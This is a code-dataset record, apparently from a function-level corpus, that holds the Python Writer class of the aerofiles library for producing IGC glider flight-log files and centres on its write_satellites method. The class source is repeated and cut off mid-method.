Write the firmware version header::
writer.write_firmware_version('6.4')
# -> HFRFWFIRMWAREVERSION:6.4
:param firmware_version: the firmware version of the flight recorder
"""
self.write_fr_header(
'RFW', firmware_version, subtype_long='FIRMWAREVERSION')
def write_hardware_version(self, hardware_version):
"""
Write the hardware version header::
writer.write_hardware_version('1.2')
# -> HFRHWHARDWAREVERSION:1.2
:param hardware_version: the hardware version of the flight recorder
"""
self.write_fr_header(
'RHW', hardware_version, subtype_long='HARDWAREVERSION')
def write_logger_type(self, logger_type):
"""
Write the extended logger type header::
writer.write_logger_type('Flarm-IGC')
# -> HFFTYFRTYPE:Flarm-IGC
:param logger_type: the extended type information of the flight
recorder
"""
self.write_fr_header('FTY', logger_type, subtype_long='FRTYPE')
def write_gps_receiver(self, gps_receiver):
"""
Write the GPS receiver header::
writer.write_gps_receiver('uBLOX LEA-4S-2,16,max9000m')
# -> HFGPSuBLOX LEA-4S-2,16,max9000m
:param gps_receiver: the GPS receiver information
"""
self.write_fr_header('GPS', gps_receiver)
def write_pressure_sensor(self, pressure_sensor):
"""
Write the pressure sensor header::
writer.write_pressure_sensor('Intersema MS5534B,8191')
# -> HFPRSPRESSALTSENSOR:Intersema MS5534B,8191
:param pressure_sensor: the pressure sensor information
"""
self.write_fr_header(
'PRS', pressure_sensor, subtype_long='PRESSALTSENSOR')
def write_competition_id(self, competition_id):
"""
Write the optional competition id declaration header::
writer.write_competition_id('TH')
# -> HFCIDCOMPETITIONID:TH
:param competition_id: competition id of the glider
"""
self.write_fr_header(
'CID', competition_id, subtype_long='COMPETITIONID')
def write_competition_class(self, competition_class):
"""
Write the optional competition class declaration header::
writer.write_competition_class('Club')
# -> HFCCLCOMPETITIONCLASS:Club
:param competition_class: competition class of the glider
"""
self.write_fr_header(
'CCL', competition_class, subtype_long='COMPETITIONCLASS')
def write_club(self, club):
"""
Write the optional club declaration header::
writer.write_club('LV Aachen')
# -> HFCLBCLUB:LV Aachen
:param club: club or organisation for which this flight should be
scored
"""
self.write_fr_header('CLB', club, subtype_long='CLUB')
def write_headers(self, headers):
"""
Write all the necessary headers in the correct order::
writer.write_headers({
'manufacturer_code': 'XCS',
'logger_id': 'TBX',
'date': datetime.date(1987, 2, 24),
'fix_accuracy': 50,
'pilot': 'Tobias Bieniek',
'copilot': 'John Doe',
'glider_type': 'Duo Discus',
'glider_id': 'D-KKHH',
'firmware_version': '2.2',
'hardware_version': '2',
'logger_type': 'LXNAVIGATION,LX8000F',
'gps_receiver': 'uBLOX LEA-4S-2,16,max9000m',
'pressure_sensor': 'INTERSEMA,MS5534A,max10000m',
'competition_id': '2H',
'competition_class': 'Doubleseater',
})
# -> AXCSTBX
# -> HFDTE870224
# -> HFFXA050
# -> HFPLTPILOTINCHARGE:Tobias Bieniek
# -> HFCM2CREW2:John Doe
# -> HFGTYGLIDERTYPE:Duo Discus
# -> HFGIDGLIDERID:D-KKHH
# -> HFDTM100GPSDATUM:WGS-1984
# -> HFRFWFIRMWAREVERSION:2.2
# -> HFRHWHARDWAREVERSION:2
# -> HFFTYFRTYPE:LXNAVIGATION,LX8000F
# -> HFGPSuBLOX LEA-4S-2,16,max9000m
# -> HFPRSPRESSALTSENSOR:INTERSEMA,MS5534A,max10000m
# -> HFCIDCOMPETITIONID:2H
# -> HFCCLCOMPETITIONCLASS:Doubleseater
This method will throw a :class:`ValueError` if a mandatory header is
missing and will fill others up with empty strings if no value was
given. The optional headers are only written if they are part of the
specified :class:`dict`.
.. admonition:: Note
The use of this method is encouraged compared to calling all the
other header-writing methods manually!
:param headers: a :class:`dict` of all the headers that should be
written.
"""
for header in self.REQUIRED_HEADERS:
if header not in headers:
raise ValueError('%s header missing' % header)
self.write_logger_id(
headers['manufacturer_code'],
headers['logger_id'],
extension=headers.get('logger_id_extension')
)
self.write_date(headers['date'])
self.write_fix_accuracy(headers.get('fix_accuracy'))
self.write_pilot(headers.get('pilot', ''))
if 'copilot' in headers:
self.write_copilot(headers['copilot'])
self.write_glider_type(headers.get('glider_type', ''))
self.write_glider_id(headers.get('glider_id', ''))
self.write_gps_datum(
code=headers.get('gps_datum_code'),
gps_datum=headers.get('gps_datum'),
)
self.write_firmware_version(headers.get('firmware_version', ''))
self.write_hardware_version(headers.get('hardware_version', ''))
self.write_logger_type(headers['logger_type'])
self.write_gps_receiver(headers['gps_receiver'])
self.write_pressure_sensor(headers.get('pressure_sensor', ''))
if 'competition_id' in headers:
self.write_competition_id(headers['competition_id'])
if 'competition_class' in headers:
self.write_competition_class(headers['competition_class'])
if 'club' in headers:
self.write_club(headers['club'])
def write_extensions(self, type, start_byte, extensions):
num_extensions = len(extensions)
if num_extensions >= 100:
raise ValueError('Too many extensions')
record = '%02d' % num_extensions
for extension, length in extensions:
if not patterns.EXTENSION_CODE.match(extension):
raise ValueError('Invalid extension: %s' % extension)
end_byte = start_byte + length - 1
record += '%02d%02d%s' % (start_byte, end_byte, extension)
start_byte = start_byte + length
self.write_record(type, record)
def write_fix_extensions(self, extensions):
"""
Write the fix extensions description header::
writer.write_fix_extensions([('FXA', 3), ('SIU', 2), ('ENL', 3)])
# -> I033638FXA3940SIU4143ENL
:param extensions: a list of ``(extension, length)`` tuples
"""
self.fix_extensions = extensions
self.write_extensions('I', 36, extensions)
def write_k_record_extensions(self, extensions):
"""
Write the K record extensions description header::
writer.write_k_record_extensions([('HDT', 5)])
# -> J010812HDT
Use :meth:`~aerofiles.igc.Writer.write_k_record` to write the
associated records.
:param extensions: a list of ``(extension, length)`` tuples
"""
self.k_record_extensions = extensions
self.write_extensions('J', 8, extensions)
def write_task_metadata(
self, declaration_datetime=None, flight_date=None,
task_number=None, turnpoints=None, text=None):
"""
Write the task declaration metadata record::
writer.write_task_metadata(
datetime.datetime(2014, 4, 13, 12, 53, 02),
task_number=42,
turnpoints=3,
)
# -> C140413125302000000004203
There are sensible defaults in place for all parameters except for the
``turnpoints`` parameter. If you don't pass that parameter the method
will raise a :class:`ValueError`. The other parameter defaults are
mentioned in the list below.
:param declaration_datetime: a :class:`datetime.datetime` instance of
the UTC date and time at the time of declaration (default: current
date and time)
:param flight_date: a :class:`datetime.date` instance of the intended
date of the flight (default: ``000000``, which means "use
declaration date")
:param task_number: task number for the flight date or an integer-based
identifier (default: ``0001``)
:param turnpoints: the number of turnpoints in the task (not counting
start and finish points!)
:param text: optional text to append to the metadata record
"""
if declaration_datetime is None:
declaration_datetime = datetime.datetime.utcnow()
if isinstance(declaration_datetime, datetime.datetime):
declaration_datetime = (
self.format_date(declaration_datetime) +
self.format_time(declaration_datetime)
)
elif not patterns.DATETIME.match(declaration_datetime):
raise ValueError('Invalid declaration datetime: %s' %
declaration_datetime)
if flight_date is None:
flight_date = '000000'
else:
flight_date = self.format_date(flight_date)
if task_number is None:
task_number = 1
elif not isinstance(task_number, int):
raise ValueError('Invalid task number: %s' % task_number)
if not isinstance(turnpoints, int):
raise ValueError('Invalid turnpoints: %s' % turnpoints)
record = '{0}{1}{2:04d}{3:02d}'.format(
declaration_datetime,
flight_date,
task_number,
turnpoints,
)
if text:
record += text
self.write_record('C', record)
def write_task_point(self, latitude=None, longitude=None, text='',
distance_min=None, distance_max=None,
bearing1=None, bearing2=None):
"""
Write a task declaration point::
writer.write_task_point(
latitude=(51 + 7.345 / 60.),
longitude=(6 + 24.765 / 60.),
text='Meiersberg',
)
# -> C5107345N00624765EMeiersberg
If no ``latitude`` or ``longitude`` is passed, the fields will be
filled with zeros (i.e. unknown coordinates). This however should only
be used for ``TAKEOFF`` and ``LANDING`` points.
For area tasks there are some additional parameters that can be used
to specify the relevant areas::
writer.write_task_point(
-(12 + 32.112 / 60.),
-(178 + .001 / 60.),
'TURN AREA',
distance_min=12.0,
distance_max=32.0,
bearing1=122.0,
bearing2=182.0,
)
# -> C1232112S17800001W00120000032000122000182000TURN AREA
:param latitude: latitude of the point (between -90 and 90 degrees)
:param longitude: longitude of the point (between -180 and 180 degrees)
:param text: type and/or name of the waypoint (e.g. ``TAKEOFF``,
``START``, ``TURN 1``, ``TURN 2``, ``FINISH`` or ``LANDING``)
"""
latitude = self.format_latitude(latitude)
longitude = self.format_longitude(longitude)
record = latitude + longitude
if None not in [distance_min, distance_max, bearing1, bearing2]:
record += '%04d' % int(distance_min)
record += '%03d' % int((distance_min - int(distance_min)) * 1000)
record += '%04d' % int(distance_max)
record += '%03d' % int((distance_max - int(distance_max)) * 1000)
record += '%03d' % int(bearing1)
record += '%03d' % int((bearing1 - int(bearing1)) * 1000)
record += '%03d' % int(bearing2)
record += '%03d' % int((bearing2 - int(bearing2)) * 1000)
if text:
record += text
self.write_record('C', record)
def write_task_points(self, points):
"""
Write multiple task declaration points with one call::
writer.write_task_points([
(None, None, 'TAKEOFF'),
(51.40375, 6.41275, 'START'),
(50.38210, 8.82105, 'TURN 1'),
(50.59045, 7.03555, 'TURN 2', 0, 32.5, 0, 180),
(51.40375, 6.41275, 'FINISH'),
(None, None, 'LANDING'),
])
# -> C0000000N00000000ETAKEOFF
# -> C5124225N00624765ESTART
# -> C5022926N00849263ETURN 1
# -> C5035427N00702133E00000000032500000000180000TURN 2
# -> C5124225N00624765EFINISH
# -> C0000000N00000000ELANDING
see the :meth:`~aerofiles.igc.Writer.write_task_point` method for more
information.
:param points: a list of ``(latitude, longitude, text)`` tuples. use
``(latitude, longitude, text, distance_min, distance_max, bearing1,
bearing2)`` tuples for area task points.
"""
for args in points:
if len(args) not in [3, 7]:
raise ValueError('Invalid number of task point tuple items')
self.write_task_point(*args)
def write_security(self, security, bytes_per_line=75):
"""
Write the security signature::
writer.write_security('ABCDEF')
# -> GABCDEF
If a signature of more than 75 bytes is used the G record will be
broken into multiple lines according to the IGC file specification.
This rule can be configured with the ``bytes_per_line`` parameter if
necessary.
:param security: the security signature
:param bytes_per_line: the maximum number of bytes per line
(default: ``75``)
"""
for start in range(0, len(security), bytes_per_line):
self.write_record('G', security[start:start + bytes_per_line])
def write_fix(self, time=None, latitude=None, longitude=None, valid=False,
pressure_alt=None, gps_alt=None, extensions=None):
"""
Write a fix record::
writer.write_fix(
datetime.time(12, 34, 56),
latitude=51.40375,
longitude=6.41275,
valid=True,
pressure_alt=1234,
gps_alt=1432,
)
# -> B1234565124225N00624765EA0123401432
:param time: UTC time of the fix record (default:
:meth:`~datetime.datetime.utcnow`)
:param latitude: longitude of the last GPS fix
:param longitude: latitude of the last GPS fix
:param valid: ``True`` if the current GPS fix is 3D
:param pressure_alt: altitude to the ICAO ISA above the 1013.25 hPa
sea level datum
:param gps_alt: altitude above the WGS84 ellipsoid
:param extensions: a list of extension values according to previous
declaration through
:meth:`~aerofiles.igc.Writer.write_fix_extensions`
"""
if time is None:
time = datetime.datetime.utcnow()
record = self.format_time(time)
record += self.format_latitude(latitude)
record += self.format_longitude(longitude)
record += 'A' if valid else 'V'
record += '%05d' % (pressure_alt or 0)
record += '%05d' % (gps_alt or 0)
if self.fix_extensions or extensions:
if not (isinstance(extensions, list) and
isinstance(self.fix_extensions, list)):
raise ValueError('Invalid extensions list')
if len(extensions) != len(self.fix_extensions):
raise ValueError(
'Number of extensions does not match declaration')
for type_length, value in zip(self.fix_extensions, extensions):
length = type_length[1]
if isinstance(value, (int, float)):
value = ('%0' + str(length) + 'd') % value
if len(value) != length:
raise ValueError('Extension value has wrong length')
record += value
self.write_record('B', record)
def write_satellites(self, *args):
"""
Write a satellite constellation record::
writer.write_satellites(datetime.time(12, 34, 56), [1, 2, 5, 22])
# -> F12345601020522
:param time: UTC time of the satellite constellation record (default:
:meth:`~datetime.datetime.utcnow`)
:param satellites: a list of satellite IDs as either two-character
strings or integers below 100
"""
num_args = len(args)
if num_args not in (1, 2):
raise ValueError('Invalid number of parameters received')
if num_args == 1:
satellites = args[0]
time = None
else:
time, satellites = args
if time is None:
time = datetime.datetime.utcnow()
record = self.format_time(time)
for satellite in satellites:
if isinstance(satellite, int):
satellite = '%02d' % satellite
if len(satellite) != 2:
raise ValueError('Invalid satellite ID')
record += satellite
self.write_record('F', record)
def write_k_record(self, *args):
"""
Write a K record::
writer.write_k_record_extensions([
('FXA', 3), ('SIU', 2), ('ENL', 3),
])
writer.write_k_record(datetime.time(2, 3, 4), ['023', 13, 2])
# -> J030810FXA1112SIU1315ENL
# -> K02030402313002
:param time: UTC time of the k record (default:
:meth:`~datetime.datetime.utcnow`)
:param extensions: a list of extension values according to previous
declaration through
:meth:`~aerofiles.igc.Writer.write_k_record_extensions`
"""
num_args = len(args)
if num_args not in (1, 2):
raise ValueError('Invalid number of parameters received')
if num_args == 1:
extensions = args[0]
time = None
else:
time, extensions = args
if time is None:
time = datetime.datetime.utcnow()
record = self.format_time(time)
if not (isinstance(extensions, list) and
isinstance(self.k_record_extensions, list)):
raise ValueError('Invalid extensions list')
if len(extensions) != len(self.k_record_extensions):
raise ValueError(
'Number of extensions does not match declaration')
for type_length, value in zip(self.k_record_extensions, extensions):
length = type_length[1]
if isinstance(value, (int, float)):
value = ('%0' + str(length) + 'd') % value
if len(value) != length:
raise ValueError('Extension value has wrong length')
record += value
self.write_record('K', record)
def write_comment(self, code, text):
"""
Write a comment record::
writer.write_comment('PLT', 'Arrived at the first turnpoint')
# -> LPLTArrived at the first turnpoint
:param code: a three-letter-code describing the source of the comment
(e.g. ``PLT`` for pilot)
:param text: the text that should be added to the comment
"""
if not patterns.THREE_LETTER_CODE.match(code):
raise ValueError('Invalid source')
self.write_record('L', code + text)
|
Turbo87/aerofiles | aerofiles/igc/writer.py | Writer.write_satellites | python | def write_satellites(self, *args):
num_args = len(args)
if num_args not in (1, 2):
raise ValueError('Invalid number of parameters received')
if num_args == 1:
satellites = args[0]
time = None
else:
time, satellites = args
if time is None:
time = datetime.datetime.utcnow()
record = self.format_time(time)
for satellite in satellites:
if isinstance(satellite, int):
satellite = '%02d' % satellite
if len(satellite) != 2:
raise ValueError('Invalid satellite ID')
record += satellite
self.write_record('F', record) | Write a satellite constellation record::
writer.write_satellites(datetime.time(12, 34, 56), [1, 2, 5, 22])
# -> F12345601020522
:param time: UTC time of the satellite constellation record (default:
:meth:`~datetime.datetime.utcnow`)
:param satellites: a list of satellite IDs as either two-character
strings or integers below 100 | train | https://github.com/Turbo87/aerofiles/blob/d8b7b04a1fcea5c98f89500de1164619a4ec7ef4/aerofiles/igc/writer.py#L769-L806 | [
"def format_time(self, time):\n if isinstance(time, datetime.datetime):\n time = time.time()\n\n if isinstance(time, datetime.time):\n time = time.strftime('%H%M%S')\n\n if not patterns.TIME.match(time):\n raise ValueError(\"Invalid time: \" + time)\n\n return time\n",
"def write_... | class Writer:
"""
A writer for the IGC flight log file format.
"""
REQUIRED_HEADERS = [
'manufacturer_code',
'logger_id',
'date',
'logger_type',
'gps_receiver',
]
def __init__(self, fp=None):
self.fp = fp
self.fix_extensions = None
self.k_record_extensions = None
def format_date(self, date):
if isinstance(date, datetime.datetime):
date = date.date()
if isinstance(date, datetime.date):
date = date.strftime('%d%m%y')
if not patterns.DATE.match(date):
raise ValueError("Invalid date: " + date)
return date
def format_time(self, time):
if isinstance(time, datetime.datetime):
time = time.time()
if isinstance(time, datetime.time):
time = time.strftime('%H%M%S')
if not patterns.TIME.match(time):
raise ValueError("Invalid time: " + time)
return time
def format_coordinate(self, value, default=None, is_latitude=True):
if value is None:
return default
if is_latitude:
if not -90 <= value <= 90:
raise ValueError('Invalid latitude: %s' % value)
hemisphere = 'S' if value < 0 else 'N'
format = '%02d%05d%s'
else:
if not -180 <= value <= 180:
raise ValueError('Invalid longitude: %s' % value)
hemisphere = 'W' if value < 0 else 'E'
format = '%03d%05d%s'
value = abs(value)
degrees = int(value)
milliminutes = round((value - degrees) * 60000)
return format % (degrees, milliminutes, hemisphere)
def format_latitude(self, value):
return self.format_coordinate(
value, default='0000000N', is_latitude=True)
def format_longitude(self, value):
return self.format_coordinate(
value, default='00000000E', is_latitude=False)
def write_line(self, line):
self.fp.write((line + u'\r\n').encode('ascii', 'replace'))
def write_record(self, type, record):
self.write_line(type + record)
def write_logger_id(self, manufacturer, logger_id, extension=None,
validate=True):
"""
Write the manufacturer and logger id header line::
writer.write_logger_id('XXX', 'ABC', extension='FLIGHT:1')
# -> AXXXABCFLIGHT:1
Some older loggers have decimal logger ids which can be written like
this::
writer.write_logger_id('FIL', '13961', validate=False)
# -> AFIL13961
:param manufacturer: the three-letter-code of the manufacturer
:param logger_id: the logger id as three-letter-code
:param extension: anything else that should be appended to this header
(e.g. ``FLIGHT:1``)
:param validate: whether to validate the manufacturer and logger_id
three-letter-codes
"""
if validate:
if not patterns.MANUFACTURER_CODE.match(manufacturer):
raise ValueError('Invalid manufacturer code')
if not patterns.LOGGER_ID.match(logger_id):
raise ValueError('Invalid logger id')
record = '%s%s' % (manufacturer, logger_id)
if extension:
record = record + extension
self.write_record('A', record)
def write_header(self, source, subtype, value,
subtype_long=None, value_long=None):
if source not in ('F', 'O'):
raise ValueError('Invalid source: %s' % source)
if not subtype_long:
record = '%s%s%s' % (source, subtype, value)
elif not value_long:
record = '%s%s%s:%s' % (source, subtype, subtype_long, value)
else:
record = '%s%s%s%s:%s' % \
(source, subtype, value, subtype_long, value_long)
self.write_record('H', record)
def write_fr_header(self, subtype, value,
subtype_long=None, value_long=None):
self.write_header(
'F', subtype, value,
subtype_long=subtype_long, value_long=value_long
)
def write_date(self, date):
"""
Write the date header::
writer.write_date(datetime.date(2014, 5, 2))
# -> HFDTE140502
:param date: a :class:`datetime.date` instance
"""
self.write_fr_header('DTE', self.format_date(date))
def write_fix_accuracy(self, accuracy=None):
"""
Write the GPS fix accuracy header::
writer.write_fix_accuracy()
# -> HFFXA500
writer.write_fix_accuracy(25)
# -> HFFXA025
:param accuracy: the estimated GPS fix accuracy in meters (optional)
"""
if accuracy is None:
accuracy = 500
accuracy = int(accuracy)
if not 0 < accuracy < 1000:
raise ValueError('Invalid fix accuracy')
self.write_fr_header('FXA', '%03d' % accuracy)
def write_pilot(self, pilot):
"""
Write the pilot declaration header::
writer.write_pilot('Tobias Bieniek')
# -> HFPLTPILOTINCHARGE:Tobias Bieniek
:param pilot: name of the pilot
"""
self.write_fr_header('PLT', pilot, subtype_long='PILOTINCHARGE')
def write_copilot(self, copilot):
"""
Write the copilot declaration header::
writer.write_copilot('John Doe')
# -> HFCM2CREW2:John Doe
:param copilot: name of the copilot
"""
self.write_fr_header('CM2', copilot, subtype_long='CREW2')
def write_glider_type(self, glider_type):
"""
Write the glider type declaration header::
writer.write_glider_type('Hornet')
# -> HFGTYGLIDERTYPE:Hornet
:param glider_type: the glider type (e.g. ``Hornet``)
"""
self.write_fr_header('GTY', glider_type, subtype_long='GLIDERTYPE')
def write_glider_id(self, glider_id):
"""
Write the glider id declaration header::
writer.write_glider_id('D-4449')
# -> HFGIDGLIDERID:D-4449
The glider id is usually the official registration number of the
airplane. For example:``D-4449`` or ``N116EL``.
:param glider_id: the glider registration number
"""
self.write_fr_header('GID', glider_id, subtype_long='GLIDERID')
def write_gps_datum(self, code=None, gps_datum=None):
"""
Write the mandatory GPS datum header::
writer.write_gps_datum()
# -> HFDTM100GPSDATUM:WGS-1984
writer.write_gps_datum(33, 'Guam-1963')
# -> HFDTM033GPSDATUM:Guam-1963
Note that the default GPS datum is WGS-1984 and you should use that
unless you have very good reasons against it.
:param code: the GPS datum code as defined in the IGC file
specification, section A8
:param gps_datum: the GPS datum in written form
"""
if code is None:
code = 100
if gps_datum is None:
gps_datum = 'WGS-1984'
self.write_fr_header(
'DTM',
'%03d' % code,
subtype_long='GPSDATUM',
value_long=gps_datum,
)
def write_firmware_version(self, firmware_version):
"""
Write the firmware version header::
writer.write_firmware_version('6.4')
# -> HFRFWFIRMWAREVERSION:6.4
:param firmware_version: the firmware version of the flight recorder
"""
self.write_fr_header(
'RFW', firmware_version, subtype_long='FIRMWAREVERSION')
def write_hardware_version(self, hardware_version):
"""
Write the hardware version header::
writer.write_hardware_version('1.2')
# -> HFRHWHARDWAREVERSION:1.2
:param hardware_version: the hardware version of the flight recorder
"""
self.write_fr_header(
'RHW', hardware_version, subtype_long='HARDWAREVERSION')
def write_logger_type(self, logger_type):
"""
Write the extended logger type header::
writer.write_logger_type('Flarm-IGC')
# -> HFFTYFRTYPE:Flarm-IGC
:param logger_type: the extended type information of the flight
recorder
"""
self.write_fr_header('FTY', logger_type, subtype_long='FRTYPE')
def write_gps_receiver(self, gps_receiver):
"""
Write the GPS receiver header::
writer.write_gps_receiver('uBLOX LEA-4S-2,16,max9000m')
# -> HFGPSuBLOX LEA-4S-2,16,max9000m
:param gps_receiver: the GPS receiver information
"""
self.write_fr_header('GPS', gps_receiver)
def write_pressure_sensor(self, pressure_sensor):
"""
Write the pressure sensor header::
writer.write_pressure_sensor('Intersema MS5534B,8191')
# -> HFPRSPRESSALTSENSOR:Intersema MS5534B,8191
:param pressure_sensor: the pressure sensor information
"""
self.write_fr_header(
'PRS', pressure_sensor, subtype_long='PRESSALTSENSOR')
def write_competition_id(self, competition_id):
"""
Write the optional competition id declaration header::
writer.write_competition_id('TH')
# -> HFCIDCOMPETITIONID:TH
:param competition_id: competition id of the glider
"""
self.write_fr_header(
'CID', competition_id, subtype_long='COMPETITIONID')
def write_competition_class(self, competition_class):
"""
Write the optional competition class declaration header::
writer.write_competition_class('Club')
# -> HFCCLCOMPETITIONCLASS:Club
:param competition_class: competition class of the glider
"""
self.write_fr_header(
'CCL', competition_class, subtype_long='COMPETITIONCLASS')
def write_club(self, club):
"""
Write the optional club declaration header::
writer.write_club('LV Aachen')
# -> HFCLBCLUB:LV Aachen
:param club: club or organisation for which this flight should be
scored
"""
self.write_fr_header('CLB', club, subtype_long='CLUB')
def write_headers(self, headers):
"""
Write all the necessary headers in the correct order::
writer.write_headers({
'manufacturer_code': 'XCS',
'logger_id': 'TBX',
'date': datetime.date(1987, 2, 24),
'fix_accuracy': 50,
'pilot': 'Tobias Bieniek',
'copilot': 'John Doe',
'glider_type': 'Duo Discus',
'glider_id': 'D-KKHH',
'firmware_version': '2.2',
'hardware_version': '2',
'logger_type': 'LXNAVIGATION,LX8000F',
'gps_receiver': 'uBLOX LEA-4S-2,16,max9000m',
'pressure_sensor': 'INTERSEMA,MS5534A,max10000m',
'competition_id': '2H',
'competition_class': 'Doubleseater',
})
# -> AXCSTBX
# -> HFDTE870224
# -> HFFXA050
# -> HFPLTPILOTINCHARGE:Tobias Bieniek
# -> HFCM2CREW2:John Doe
# -> HFGTYGLIDERTYPE:Duo Discus
# -> HFGIDGLIDERID:D-KKHH
# -> HFDTM100GPSDATUM:WGS-1984
# -> HFRFWFIRMWAREVERSION:2.2
# -> HFRHWHARDWAREVERSION:2
# -> HFFTYFRTYPE:LXNAVIGATION,LX8000F
# -> HFGPSuBLOX LEA-4S-2,16,max9000m
# -> HFPRSPRESSALTSENSOR:INTERSEMA,MS5534A,max10000m
# -> HFCIDCOMPETITIONID:2H
# -> HFCCLCOMPETITIONCLASS:Doubleseater
This method will throw a :class:`ValueError` if a mandatory header is
missing and will fill others up with empty strings if no value was
given. The optional headers are only written if they are part of the
specified :class:`dict`.
.. admonition:: Note
The use of this method is encouraged compared to calling all the
other header-writing methods manually!
:param headers: a :class:`dict` of all the headers that should be
written.
"""
for header in self.REQUIRED_HEADERS:
if header not in headers:
raise ValueError('%s header missing' % header)
self.write_logger_id(
headers['manufacturer_code'],
headers['logger_id'],
extension=headers.get('logger_id_extension')
)
self.write_date(headers['date'])
self.write_fix_accuracy(headers.get('fix_accuracy'))
self.write_pilot(headers.get('pilot', ''))
if 'copilot' in headers:
self.write_copilot(headers['copilot'])
self.write_glider_type(headers.get('glider_type', ''))
self.write_glider_id(headers.get('glider_id', ''))
self.write_gps_datum(
code=headers.get('gps_datum_code'),
gps_datum=headers.get('gps_datum'),
)
self.write_firmware_version(headers.get('firmware_version', ''))
self.write_hardware_version(headers.get('hardware_version', ''))
self.write_logger_type(headers['logger_type'])
self.write_gps_receiver(headers['gps_receiver'])
self.write_pressure_sensor(headers.get('pressure_sensor', ''))
if 'competition_id' in headers:
self.write_competition_id(headers['competition_id'])
if 'competition_class' in headers:
self.write_competition_class(headers['competition_class'])
if 'club' in headers:
self.write_club(headers['club'])
def write_extensions(self, type, start_byte, extensions):
num_extensions = len(extensions)
if num_extensions >= 100:
raise ValueError('Too many extensions')
record = '%02d' % num_extensions
for extension, length in extensions:
if not patterns.EXTENSION_CODE.match(extension):
raise ValueError('Invalid extension: %s' % extension)
end_byte = start_byte + length - 1
record += '%02d%02d%s' % (start_byte, end_byte, extension)
start_byte = start_byte + length
self.write_record(type, record)
def write_fix_extensions(self, extensions):
"""
Write the fix extensions description header::
writer.write_fix_extensions([('FXA', 3), ('SIU', 2), ('ENL', 3)])
# -> I033638FXA3940SIU4143ENL
:param extensions: a list of ``(extension, length)`` tuples
"""
self.fix_extensions = extensions
self.write_extensions('I', 36, extensions)
def write_k_record_extensions(self, extensions):
"""
Write the K record extensions description header::
writer.write_k_record_extensions([('HDT', 5)])
# -> J010812HDT
Use :meth:`~aerofiles.igc.Writer.write_k_record` to write the
associated records.
:param extensions: a list of ``(extension, length)`` tuples
"""
self.k_record_extensions = extensions
self.write_extensions('J', 8, extensions)
def write_task_metadata(
self, declaration_datetime=None, flight_date=None,
task_number=None, turnpoints=None, text=None):
"""
Write the task declaration metadata record::
writer.write_task_metadata(
datetime.datetime(2014, 4, 13, 12, 53, 02),
task_number=42,
turnpoints=3,
)
# -> C140413125302000000004203
There are sensible defaults in place for all parameters except for the
``turnpoints`` parameter. If you don't pass that parameter the method
will raise a :class:`ValueError`. The other parameter defaults are
mentioned in the list below.
:param declaration_datetime: a :class:`datetime.datetime` instance of
the UTC date and time at the time of declaration (default: current
date and time)
:param flight_date: a :class:`datetime.date` instance of the intended
date of the flight (default: ``000000``, which means "use
declaration date")
:param task_number: task number for the flight date or an integer-based
identifier (default: ``0001``)
:param turnpoints: the number of turnpoints in the task (not counting
start and finish points!)
:param text: optional text to append to the metadata record
"""
if declaration_datetime is None:
declaration_datetime = datetime.datetime.utcnow()
if isinstance(declaration_datetime, datetime.datetime):
declaration_datetime = (
self.format_date(declaration_datetime) +
self.format_time(declaration_datetime)
)
elif not patterns.DATETIME.match(declaration_datetime):
raise ValueError('Invalid declaration datetime: %s' %
declaration_datetime)
if flight_date is None:
flight_date = '000000'
else:
flight_date = self.format_date(flight_date)
if task_number is None:
task_number = 1
elif not isinstance(task_number, int):
raise ValueError('Invalid task number: %s' % task_number)
if not isinstance(turnpoints, int):
raise ValueError('Invalid turnpoints: %s' % turnpoints)
record = '{0}{1}{2:04d}{3:02d}'.format(
declaration_datetime,
flight_date,
task_number,
turnpoints,
)
if text:
record += text
self.write_record('C', record)
def write_task_point(self, latitude=None, longitude=None, text='',
distance_min=None, distance_max=None,
bearing1=None, bearing2=None):
"""
Write a task declaration point::
writer.write_task_point(
latitude=(51 + 7.345 / 60.),
longitude=(6 + 24.765 / 60.),
text='Meiersberg',
)
# -> C5107345N00624765EMeiersberg
If no ``latitude`` or ``longitude`` is passed, the fields will be
filled with zeros (i.e. unknown coordinates). This however should only
be used for ``TAKEOFF`` and ``LANDING`` points.
For area tasks there are some additional parameters that can be used
to specify the relevant areas::
writer.write_task_point(
-(12 + 32.112 / 60.),
-(178 + .001 / 60.),
'TURN AREA',
distance_min=12.0,
distance_max=32.0,
bearing1=122.0,
bearing2=182.0,
)
# -> C1232112S17800001W00120000032000122000182000TURN AREA
:param latitude: latitude of the point (between -90 and 90 degrees)
:param longitude: longitude of the point (between -180 and 180 degrees)
:param text: type and/or name of the waypoint (e.g. ``TAKEOFF``,
``START``, ``TURN 1``, ``TURN 2``, ``FINISH`` or ``LANDING``)
"""
latitude = self.format_latitude(latitude)
longitude = self.format_longitude(longitude)
record = latitude + longitude
if None not in [distance_min, distance_max, bearing1, bearing2]:
record += '%04d' % int(distance_min)
record += '%03d' % int((distance_min - int(distance_min)) * 1000)
record += '%04d' % int(distance_max)
record += '%03d' % int((distance_max - int(distance_max)) * 1000)
record += '%03d' % int(bearing1)
record += '%03d' % int((bearing1 - int(bearing1)) * 1000)
record += '%03d' % int(bearing2)
record += '%03d' % int((bearing2 - int(bearing2)) * 1000)
if text:
record += text
self.write_record('C', record)
def write_task_points(self, points):
"""
Write multiple task declaration points with one call::
writer.write_task_points([
(None, None, 'TAKEOFF'),
(51.40375, 6.41275, 'START'),
(50.38210, 8.82105, 'TURN 1'),
(50.59045, 7.03555, 'TURN 2', 0, 32.5, 0, 180),
(51.40375, 6.41275, 'FINISH'),
(None, None, 'LANDING'),
])
# -> C0000000N00000000ETAKEOFF
# -> C5124225N00624765ESTART
# -> C5022926N00849263ETURN 1
# -> C5035427N00702133E00000000032500000000180000TURN 2
# -> C5124225N00624765EFINISH
# -> C0000000N00000000ELANDING
see the :meth:`~aerofiles.igc.Writer.write_task_point` method for more
information.
:param points: a list of ``(latitude, longitude, text)`` tuples. use
``(latitude, longitude, text, distance_min, distance_max, bearing1,
bearing2)`` tuples for area task points.
"""
for args in points:
if len(args) not in [3, 7]:
raise ValueError('Invalid number of task point tuple items')
self.write_task_point(*args)
def write_security(self, security, bytes_per_line=75):
"""
Write the security signature::
writer.write_security('ABCDEF')
# -> GABCDEF
If a signature of more than 75 bytes is used the G record will be
broken into multiple lines according to the IGC file specification.
This rule can be configured with the ``bytes_per_line`` parameter if
necessary.
:param security: the security signature
:param bytes_per_line: the maximum number of bytes per line
(default: ``75``)
"""
for start in range(0, len(security), bytes_per_line):
self.write_record('G', security[start:start + bytes_per_line])
def write_fix(self, time=None, latitude=None, longitude=None, valid=False,
pressure_alt=None, gps_alt=None, extensions=None):
"""
Write a fix record::
writer.write_fix(
datetime.time(12, 34, 56),
latitude=51.40375,
